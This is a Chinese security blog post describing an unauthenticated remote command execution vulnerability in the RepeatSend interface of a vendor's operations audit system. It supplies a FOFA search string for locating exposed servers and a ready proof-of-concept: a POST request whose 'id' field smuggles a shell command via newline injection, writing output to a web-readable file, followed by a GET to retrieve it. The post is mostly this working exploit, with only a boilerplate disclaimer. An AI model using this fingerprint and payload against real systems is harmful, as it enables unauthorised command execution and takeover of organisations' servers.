上讯信息技术股份有限公司运维管理系统RepeatSend命令执行漏洞

admin 2025年5月17日04:36:06评论2 views字数 429阅读1分25秒阅读模式

字数 335,阅读大约需 2 分钟

漏洞简介

上讯信息运维管理审计系统 repeatsend 远程命令执行,未经身份验证的远程攻击者可利用此漏洞写入后门文件,执行任意命令,导致服务器被控。

FOFA

body="default/getloginhtml"

POC

POST/emailapply/RepeatSendHTTP/1.1Host: Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.850.86 Safari/537.36id='%0id > 123.txt%0a'
上讯信息技术股份有限公司运维管理系统RepeatSend命令执行漏洞
GET/123.txtHTTP/1.1Host: 
上讯信息技术股份有限公司运维管理系统RepeatSend命令执行漏洞

噢,对了这个漏洞没用到代码审计的技能,只不过是前人栽树后人乘凉罢了。

懂的都懂

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月17日04:36:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   上讯信息技术股份有限公司运维管理系统RepeatSend命令执行漏洞http://cn-sec.com/archives/4074480.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息